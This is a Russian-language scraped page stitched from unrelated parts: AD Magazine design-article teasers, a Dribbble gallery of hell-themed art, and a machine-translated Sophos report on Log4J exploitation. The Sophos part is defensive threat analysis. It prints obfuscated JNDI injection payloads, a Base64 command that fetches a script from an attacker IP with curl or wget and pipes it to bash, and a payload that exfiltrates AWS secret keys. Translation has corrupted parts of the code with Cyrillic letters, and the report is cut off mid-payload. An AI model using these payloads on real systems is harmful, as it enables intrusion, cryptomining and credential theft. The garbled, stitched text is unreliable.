Ад журнал: Архитектура и дизайн | AD Magazine

Содержание

Архитектура и дизайн | AD Magazine

Skip to main content

На сайте AD могут содержаться упоминания и ссылки на Facebook и Instagram, ресурсы принадлежащие компании Meta, деятельность которой запрещена в РФ. При этом, вся информация и ссылки на Facebook и Instagram размещены до запрета деятельности Meta на территории России. На сайте AD отсутствуют запрещенные в связи с их содержанием материалы и/или ссылки на такие материалы.

Все опубликованные материалы — тексты, фоторепортажи, интерьерные истории, полезные советы по оформлению дома, видео и подкасты — доступны на сайте AD.

Читайте также

Интерьер

Квартира в охраняемом доме 1940-х годов, 88 м²

Этот проект появился на свет благодаря нестандартному заказу. Клиентка Елены Симкиной — стилист по профессии и коллекционер работ Эрте, русского графика, сценографа, модельера Романа Тыртова, который работал в Париже и Голливуде и был одним из ведущих художников эпохи ар-деко.

Дизайн

Женщины в тени мужского дизайна: 6 историй

В последнее время становится трендом говорить о женщинах в архитектуре и дизайне, будто бы компенсируя все те годы, когда их заслугам не уделяли должного внимания.

Интерьер

Квартира для сына-диджея, 80 м²

Екатерина Бегичева получила образование дирижера, поэтому о дизайне рассуждает с позиции музыканта: “Маленькое пространство боится “разноголосья”. Чтобы добиться звучания в унисон, важно единообразие как в материалах, так и в формах”. Эту квартиру она оформила для своего сына, вкусы и потребности которого знает досконально.

Квартира в охраняемом доме 1940-х годов, 88 м²

Этот проект появился на свет благодаря нестандартному заказу. Клиентка Елены Симкиной — стилист по профессии и коллекционер работ Эрте, русского графика, сценографа, модельера Романа Тыртова, который работал в Париже и Голливуде и был одним из ведущих художников эпохи ар-деко.

Женщины в тени мужского дизайна: 6 историй

В последнее время становится трендом говорить о женщинах в архитектуре и дизайне, будто бы компенсируя все те годы, когда их заслугам не уделяли должного внимания.

Квартира для сына-диджея, 80 м²

Екатерина Бегичева получила образование дирижера, поэтому о дизайне рассуждает с позиции музыканта: “Маленькое пространство боится “разноголосья”. Чтобы добиться звучания в унисон, важно единообразие как в материалах, так и в формах”. Эту квартиру она оформила для своего сына, вкусы и потребности которого знает досконально.

Дизайн в кино: пять фильмов о сильных женщинах к 8 марта

Фильмы про сильных женщин обычно включают в себя героинь в сияющих доспехах или просто владеющих как минимум несколькими видами боевых искусств. Мы решили смотреть на мир шире и собрали к 8 марта несколько неочевидных примеров сильных героинь и фильмов о них.

Масленица в Николе-Ленивце: фоторепортаж с сожжения “Вавилонской башни” 

6 марта, в последний день Масленицы, в Николе-Ленивце проводили зиму ежегодным сожжением арт-объекта. Показываем, как это было. 

Маленькие квартиры

Квартира с видом на Яузу, 76 м²

В этом проекте Hills Design Studio продемонстрировала свое творческое кредо: как можно больше воздуха и света, натуральные материалы, ручная работа и никакой показной роскоши.

Квартира в новом районе под Минском, 60 м²

Архитекторы бюро Radical Passive назвали этот проект “С любовью к Алвару и Айно”. Задача проекта — создать минималистичное пространство, наполненное светом и теплом.

Апартаменты для молодой семьи с ребенком, 72 м²

Ради того чтобы жить поближе к центру, заказчики Павла Железнова и Ивана Позднякова, молодая семья с ребенком, переехали в эти апартаменты из более просторного жилья.

Квартира для девушки, 32 м²

Заказчице нужны были полноценные гардеробная, ванная комната с душевой, кухня-гостиная с барной стойкой и спальня с туалетным столиком и двуспальной кроватью. И все получилось!

“Азбука Ремонта.Кухни” уже в продаже! Купить

Интерьеры

Квартира недалеко от Эрмитажа, 90 м²

Заказчица Веры Лемешко много лет проработала в Эрмитаже и все детство провела в его окрестностях, поэтому, когда пришло время начать новый жизненный этап, они с мужем решили перебраться поближе к дорогому сердцу району.

Квартира стилиста Дарьи Соболевой, 42 м²

Стилист Дарья Соболева освежила интерьер своей квартиры в Москве, использовав много ярких цветовых акцентов.

Квартира на мансардном этаже в центре Москвы

Команда бюро “Артформа” показывает, каким может быть настоящий честный лофт в московских условиях.

Банный комплекс в Подмосковье по проекту Марии Водолацкой

В банный комплекс в Подмосковье, оформленный дизайнером Марией Водолацкой, переехала часть вещей из дома и квартиры заказчиков.

Дизайн

Дамы, ваш выход: 13 женщин из мира дизайна, которые вдохновляют

Мир искусства, дизайна и архитектуры был бы совсем другим, если бы не женщины. Назвать всех героинь не хватит никакого журнала. В этом материале мы собрали тех, кто нас по-настоящему вдохновляет.

Сильные женщины: 14 влиятельных фотографов всех времен

Рассказываем о 14 женщинах, которые внесли неоценимый вклад в индустрию фотографии.

Стиль джапанди в интерьере: история и особенности оформления

Истоки и характеристики интерьерного стиля, который придется по сердцу поклонникам скандинавского и японского дизайна.

Паблик недели: зрительный контакт в группе Eyes

От фрагментов мировой живописи до афиш и обложек книг — с изображений в группе Eyes “ВКонтакте” на нас всегда смотрят выразительные глаза.

Как оформить

Оформление спальни в коричневых тонах: 17 примеров от дизайнеров

Землистые и древесные тона придадут спальне умиротворение и камерность. Делимся 17 примерами от дизайнеров, которые не побоялись закопаться в коричневом цвете.

Где купить

Что носить дома: 16 вариантов на каждый день

Длинные выходные не обязательно проводить активно: иногда можно позволить себе расслабиться и провести время дома. Мы нашли 16 вариантов одежды для комфортного отдыха.

Как оформить

Сервировка стола к Масленице: идеи от Марии Водолацкой

Мы заглянули в гости к дизайнеру Марии Водолацкой и посмотрели на ее коллекцию посуды и варианты весенней сервировки стола к Масленице.

Где купить

Где покупать мебель и аксессуары в России: 44 магазина, шоурума и гипермаркета

От локальных брендов мебели до гипермаркетов и онлайн-платформ — мы собрали 44 места, где можно найти все самое необходимое для интерьера.

Куда сходить

Приют спокойствия в Москве: 5 мест, где можно отдохнуть в тишине

В больших городах часто кажется, что сбежать от суеты невозможно. В этой подборке рассказываем про места, которые помогут отвлечься и ненадолго забыть о делах.

Куда сходить в марте: 7 событий

Что же делать, надо жить, как говорят чеховские герои. Надо жить, искусство дает силы и надежду на то, что когда-нибудь нормальная жизнь вернется.

“Открытие Севера. Дивование”: масштабный художественный проект в Каргополе

Четыре российских музея примут участие в выставке, которая летом пройдет в Каргополе — одном из древнейших торговых городов Русского Севера.

Bulgari B.zero1 Avrora Awards: как прошла премия, чествующая новаторство женщин

Премия при поддержке Дома Bulgari и Vogue Italia теперь вручается и в Европе.

Как оформить лофт: 8 аутентичных квартир от 26 до 175 м²

С лофтом главное — не перестараться, иначе интерьер станет бутафорией. Мы нашли восемь аутентичных квартир, которые действительно расположись в зданиях старых фабрик или идеально под них стилизованы.

Чек-лист: как сделать ремонт и ничего не забыть

В издательстве Individuum вышла книга “Я въезжаю в стройку” архитектора и руководителя бюро “Открытые планы” Оксаны Махровой. Это подробная инструкция о том, как начать и, главное, закончить ремонт. Специально для AD Оксана сделала краткий чек-лист, который поможет не упустить ни одной важной детали во время обустройства.

Интерьер

Городские легенды: мемориальная квартира Тимирязева

AD запускает новую рубрику “Городские легенды”, в которой будет заглядывать в музеи-квартиры известных людей, показывать подлинные интерьеры и рассказывать интересные истории. Открывает серию публикаций мемориальная квартира Тимирязева, где можно многое узнать не только о жизни великого ученого, но и о быте русской интеллигенции конца XIX — начала ХХ века.

Интерьер

Офис Полины Пидцан в особняке XIX века

Когда-то в стенах этого особняка в центре Москвы танцевал на балах сам Пушкин, а сегодня здесь находится новый офис дизайнера Полины Пидцан.

Интерьер

Квартира в сталинке на Кутузовском проспекте, 76 м²

“От такого наследства отказываться не стоит”, — решили владельцы квартиры, которым она досталась вместе с мебелью пятидесятых и шестидесятых годов.

Рестораны

Новая кофейня “Звон” в здании колокольни

В Черниговском переулке открылась новая кофейня “Звон”, которая расположилась прямо в здании колокольни храма Усекновения Главы Иоанна Предтечи под Бором.

Путешествия

Отель по проекту Тадао Андо в Киото

The Shinmonzen — идеальный отель для медитативного отдыха в старинном японском городе.

Новое крыло отеля Drake в Торонто

Появление нового современного крыла у отеля Drake, расположенного в историческом здания конца XIX века, стало новой главой в истории известного района Вест-Куин-Вест в Торонто. В свое время Drake стал первым дизайн-отелем Торонто. Сегодня у отеля появилось не только 32 новых номера, но и яркое, современное и очень артистичное общее пространство с нарядным лобби за массивной латунной дверью и уютным баром за красными бархатными шторами.

“Дом медведей”: фотопроект Дмитрия Коха на острове Колючин

IT-бизнесмен и фотограф Дмитрий Кох отправился в далекую экспедицию, но из-за шторма был вынужден остановиться на крохотном острове Колючин. Именно там состоялась неожиданная встреча с белыми медведями и родилась впечатляющая серия фотографий.

Минималистская пиццерия на Сардинии

Краски и фактуры средиземноморского острова в поэтичном интерьере от Studio Wok.

Архитектура | AD Magazine

На сайте AD могут содержаться упоминания и ссылки на Facebook и Instagram, ресурсы принадлежащие компании Meta, деятельность которой запрещена в РФ. При этом, вся информация и ссылки на Facebook и Instagram размещены до запрета деятельности Meta на территории России. На сайте AD отсутствуют запрещенные в связи с их содержанием материалы и/или ссылки на такие материалы.

Дизайн

Женщины в тени мужского дизайна: 6 историй

В последнее время становится трендом говорить о женщинах в архитектуре и дизайне, будто бы компенсируя все те годы, когда их заслугам не уделяли должного внимания.

Архитектура

Масленица в Николе-Ленивце: фоторепортаж с сожжения “Вавилонской башни” 

6 марта, в последний день Масленицы, в Николе-Ленивце проводили зиму ежегодным сожжением арт-объекта. Показываем, как это было. 

Дизайн

Дамы, ваш выход: 13 женщин из мира дизайна, которые вдохновляют

Мир искусства, дизайна и архитектуры был бы совсем другим, если бы не женщины. Назвать всех героинь не хватит никакого журнала. В этом материале мы собрали тех, кто нас по-настоящему вдохновляет.

Архитектура

Как женщины покоряли архитектурный мир: история с XIX века до наших дней

Женщины, которые не словом, а делом доказали, что они ­вовсе не слабый пол.

Интерьер

Городские легенды: мемориальная квартира Тимирязева

AD запускает новую рубрику “Городские легенды”, в которой будет заглядывать в музеи-квартиры известных людей, показывать подлинные интерьеры и рассказывать интересные истории. Открывает серию публикаций мемориальная квартира Тимирязева, где можно многое узнать не только о жизни великого ученого, но и о быте русской интеллигенции конца XIX — начала ХХ века.

Архитектура

Что для вас значит “дом”: социокультурное исследование в России

Команда АНО “Дизайн среды и устойчивое развитие” проводит исследование понятия “дом”. Принять участие в нем может любой желающий.

Архитектура

Зал для мероприятий в здании старой теплицы

Архитекторы Forme Architecture + Urbanisme превратили старую теплицу в частном саду клиники Сен-Жан-де-Дьё в многофункциональное пространство для мероприятий.

Архитектура

Гестхаус по проекту Neri & Hu в Шэньчжэне 

Показательный проект реставрации “панельной” многоэтажки: китайские архитекторы преобразили обычный дом с помощью накладных панелей на фасадах, реорганизации крыши и создания открытых общественных пространств.

Архитектура

В Блумингтоне построили здание по потерянному проекту Людвига Мис ван дер Роэ

В Блумингтоне построили здание по проекту Людвига Мис ван дер Роэ, который он закончил в 1952 году, но не успел реализовать. 

Архитектура

Дом с внутренним садом в Эквадоре

Архитектор Фелипе Эскудеро построил этот дом для своей мамы, которая очень любит магнолии. Поэтому центральным элементом здания стал сад с цветущим деревом.

дизайнов логотипов, тем, шаблонов и графических элементов для скачивания на Dribbble

  1. Посмотреть Дай им ад

    Дай им ад

  2. Посмотреть неиспользованный концепт Hell’s River

    Неиспользованный концепт «Адская река»

  3. Просмотр дьявола

  4. Посмотреть Спасибо за вопрос

    Спасибо за вопрос

  5. Просмотреть флэш-лист Kern & Burn, год 2

    Флэш-лист Kern & Burn, год 2

  6. Посмотреть Жуткие гончие

    Жуткие гончие

  7. Посмотреть кухню лимбо

    Кухня Лимбо

  8. Посмотреть Избелл в пещере

    колокольня в пещере

  9. Посмотреть Долой моих демонов

    Долой моих демонов

  10. Посмотреть DAZE — Увидимся в аду

    DAZE — Увидимся в аду

  11. Посмотреть иллюстрацию сатаны

    Иллюстрация сатаны

  12. Посмотреть маленького помощника сатаны

    Маленький помощник сатаны

  13. Посмотреть Эль Дьябло

    Эль Диабло

  14. Посмотреть рай или ад

    Рай или Ад

  15. Посмотреть ТРИО. ..

    ТРИО …

  16. Посмотреть Ты отправишься в ад?

    Ты отправляешься в ад?

  17. Посмотреть адский поезд!

    Адский поезд!

  18. Вид 666 — Дорога в ад

    666 — Дорога в ад

  19. Посмотреть Адская гончая

    Адская гончая

  20. Посмотреть художественную печать Revelation

    Художественная печать «Откровение»

  21. Посмотреть Повторение — это ад

    Повторение — это ад

  22. Посмотреть АД ЖДЕТ

    АД ЖДЕТ

  23. Посмотреть Дикий боевой конь. Стильный эксперимент

    Дикий боевой конь. Стильный эксперимент

  24. Посмотреть шеф-повара дьявола

    Повар дьявола

Зарегистрируйтесь, чтобы продолжить или войдите

Загрузка еще…

анатомия вспышки эксплойтов – Sophos News

9 декабря в Apache Log4J была обнаружена серьезная уязвимость удаленного кода, очень распространенная система ведения журналов, используемая разработчиками веб-приложений и серверных приложений на основе Java и другие языки программирования. Уязвимость затрагивает широкий спектр служб и приложений на серверах, что делает ее чрезвычайно опасной, а последние обновления для этих серверных приложений требуют срочного решения.

Уязвимость делает возможным для любого злоумышленника, который может внедрить текст в сообщения журнала или записать параметры сообщения в журналы сервера, которые загружают код с удаленного сервера; Затем целевой сервер выполнит этот код через вызовы интерфейса именования и каталогов Java (JNDI). JNDI взаимодействует с рядом сетевых служб, включая облегченный протокол доступа к каталогам (LDAP), службу доменных имен (DNS), удаленный интерфейс Java (RMI) и общий брокер запросов к объектам (CORBA). Sophos видела попытки использовать LDAP, DNS и RMI, используя URL-адреса, помеченные для этих служб, перенаправляемых на внешний сервер.

Sophos уже обнаруживает вредоносные операции криптомайнинга, пытающиеся использовать уязвимость, и есть достоверные сообщения из других источников о том, что несколько автоматизированных ботнетов (таких как Mirai, Tsunami и Kinsing) также начали использовать ее. Другие типы атак и полезной нагрузки, скорее всего, вскоре последуют за ними. Хотя есть шаги, которые операторы серверов могут предпринять для уменьшения уязвимости, лучшим решением будет обновление до исправленной версии, уже выпущенной Apache в Log4j 2. 15.0 . Однако развертывание обновления может оказаться не таким уж простым делом, особенно если организации не знают, где оно было развернуто как компонент. (Список обнаружений вредоносных программ, связанных с Log4J, можно найти в конце этого отчета.)

Подобные критические уязвимости внедрения JNDI были обнаружены в других компонентах сервера Java в прошлом, в том числе в протоколе Internet Inter-ORB. (IIOP) реализация Oracle WebLogic Server (CVE-2020-2551). Но широкое использование Log4J как в коммерческом, так и в программном обеспечении с открытым исходным кодом, подключенном к Интернету — серверах веб-приложений и мобильных приложений, почтовых серверах (включая почтовый сервер Apache JAMES на основе Java) и облачных сервисах — делает эту уязвимость особенно трудной для отслеживания. вниз и патч. Предыдущие недостатки в Log4J были гораздо менее серьезными.

Компания Sophos уже обнаружила сотни тысяч попыток удаленного выполнения кода с использованием этой уязвимости с 9 декабря, а поиск журналов, проведенный другими организациями (включая Cloudflare), позволяет предположить, что уязвимость могла открыто эксплуатироваться за несколько недель до ее публичного раскрытия. Экземпляры, обнаруженные Sophos, в основном были сканированием на наличие уязвимостей, тестами эксплойтов и попытками установить майнеры монет. Мы также видели попытки извлечь информацию из сервисов, включая ключи Amazon Web Services и другие частные данные.

Как работает эксплойт Log4J

Недостаток в более ранних версиях Log4J вызван функцией под названием замена поиска сообщений . При включении (что было по умолчанию до исправления ошибки) Log4j обнаруживал строки, ссылающиеся на ресурсы JNDI в источниках конфигурации, сообщениях журнала и параметрах, передаваемых приложениями. Поскольку Log4J не очищает URL-адреса, переданные в этих строках, злоумышленник может создавать вредоносные запросы к приложениям, использующим Log4J, содержащие строки подстановки сообщений в полях, содержащих URL-адрес вредоносного сервера.

В случае веб-приложений строка может быть частью любой части HTTP-соединения, которое будет зарегистрировано в журнале, отформатированное как команда подстановки, которая ссылается на вредоносный сервер — в формате   ${jndi:[protocol]:/ /[удаленный сервер и кодовый адрес]} . Существует множество форм запутывания, используемых для предотвращения обнаружения сканирования или эксплуатации, включая использование вложенных строк для вызова интерфейса JNDI (например, (${${::-j}${::-n}). ${::-d}${::-I})

).

При передаче в Log4J команды поиска с использованием JNDI приводят к тому, что Log4J обращается к серверу (локальному или удаленному) для получения кода Java. В благоприятном сценарии этот код поможет сгенерировать данные, предназначенные для регистрации. Но суть этой уязвимости в том, что этот же механизм позволяет выполнять непроверенный вредоносный удаленный Java-код.

Такие инструменты, как Interactsh , делают все это слишком простым, позволяя злоумышленникам выдавать запросы, в которых заголовки HTTP «распылены» вредоносными строками, созданными для того, чтобы подтолкнуть принимающее приложение к выполнению подстановки сообщения, после чего приложение запускает уязвимость и загружает или запускает удаленный код.

Ниже приведен список заголовков HTTP в запросе GET, на котором показано, как злоумышленник использует Interactsh для поиска уязвимых серверов, добавляя ссылку JNDI почти в каждый элемент запроса:

 referer=${jndi:ldap: //[отредактировано].interact.sh},
x-http-host-override=${jndi:ldap://[отредактировано].interact.sh},
true-client-ip=${jndi:ldap://[отредактировано].interact.sh},
х-переадресованный порт = 443,
x-client-ip=${jndi:ldap://[отредактировано].interact.sh},
cf-connecting_ip=${jndi:ldap://[отредактировано].interact.sh},
x-forwarded-host=${jndi:ldap://[отредактировано].interact.sh},
контакт=${jndi:ldap://[отредактировано].interact.sh},
host=[отредактировано].com,
from=${jndi:ldap://[отредактировано].interact.sh},
управление кешем = без преобразования,
х-форвард-прото=https,
принять-язык=en,
клиент-ip=${jndi:ldap://[отредактировано].interact.sh},
x-forwarded-for=${jndi:ldap://[отредактировано].interact.sh},
x-originating-ip=${jndi:ldap://[отредактировано]. interact.sh},
x-host=${jndi:ldap://[отредактировано].interact.sh},
forwarded=${jndi:ldap://[отредактировано].interact.sh},
принять=*/*,
x-real-ip=${jndi:ldap://[отредактировано].interact.sh},

 

Payloads

Многие из первых попыток использовать эксплойт Log4J, которые мы видели, были связаны с майнерами криптовалюты. Сюда входит Kinsing, ботнет, связанный с майнерами, использующий различные методы запутывания:

 GET /?x=${jndi:ldap://93[.]189[.]42.8:5557/Basic/Command/Base64/
KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo}
HTTP/1.1" 200 3440 "${jndi:${нижний:l}${нижний:d}${нижний:a}${нижний:p}
://93[.]189.42.8:5557/Basic/Command/Base64/KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgL
XEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo}"
"${${::-j}${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${:: -а}${::-р}://93[.]189.42.8:5557
/Basic/Command/Base64/KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40M
i44L2xoLnNoKXxiYXNo}" 

Содержимое URL-адреса включает команду, закодированную в Base64:

 (curl -s 93. 189.42.8/lh.sh||wget -q -O- 93.189.42.8/lh.sh)|bash 

Sophos также зафиксировала попытки раскрыть ключи доступа к AWS с хоста, используя уязвимость Log4J, используя другой метод запутывания, чтобы избежать обнаружения вызовов JNDI.Эти строки пытаются получить целевую конечную точку для возврата переменной среды, используемой программами, которые взаимодействуют с ресурсами AWS. :

 "GET /a1${${env:lsweqw:-j}ndi${env:lsweqw:-:}${env:lsweqw:-r}mi${env:lsweqw:-:}
//[MASKED_IP}/dupa123/MASKED_HOST:80/gp/${env:USER}/${env:AWS_ACCESS_KEY_ID}/
${env:AWS_SECRET_ACCESS_KEY}/dupa1234} HTTP/1.1" 302 455 "aaaaa1${${env:lsweqw:-j}
ndi${env:lsweqw:-:}${env:lsweqw:-r}mi${env:lsweqw:-:}
//1[MASKED_IP}:1099/dupa123/MASKED_HOST:80/gr/${env:USER}/${env:AWS_ACCESS_KEY_ID}/
${env:AWS_SECRET_ACCESS_KEY}/dupa1234}" "aaaaa1${${env:lsweqw:-j}ndi${env:lsweqw:-:}
${env:lsweqw:-r}mi${env:lsweqw:-:}//[MASKED_IP]/dupa123/MASKED_HOST:80/ga/${env:USER}/
${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}/dupa1234}"
 

Обнаружение и исправление

Компания SophosLabs внедрила ряд правил IPS для сканирования трафика, пытающегося использовать уязвимость Log4J. Менее чем через день после того, как он стал общедоступным, мы увидели кратковременный всплеск целевого трафика. В выходные он начал расти, причем наибольший всплеск пришелся на вечер субботы и утро воскресенья (UTC).

Подавляющее большинство этого трафика (около 90%) использовало протокол LDAP в качестве цели для эксплойтов; меньшие подмножества использовали DNS и RMI. Часть этого трафика при проверке могла быть результатом внутреннего сканирования организаций на наличие уязвимостей, но большая его часть представляла собой попытки злоумышленников найти уязвимые системы. Выборка запросов, собранных из телеметрии, показала, что многие используют Interactsh, используя различные методы запутывания, чтобы обойти правила поиска «JNDI», такие как эти попытки использовать вызов RMI:

 ${${нижний:j}${нижний:n}${нижний:d}i:${нижний:rmi}://[идентификатор].interact.sh/poc}
${${нижний:jndi}:${нижний:rmi}://[идентификатор].interact.sh/poc}
${${нижний:j}${верхний:n}${нижний:d}${верхний:i}:${нижний:r}m${нижний:i}}:
  //[идентификатор].	

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *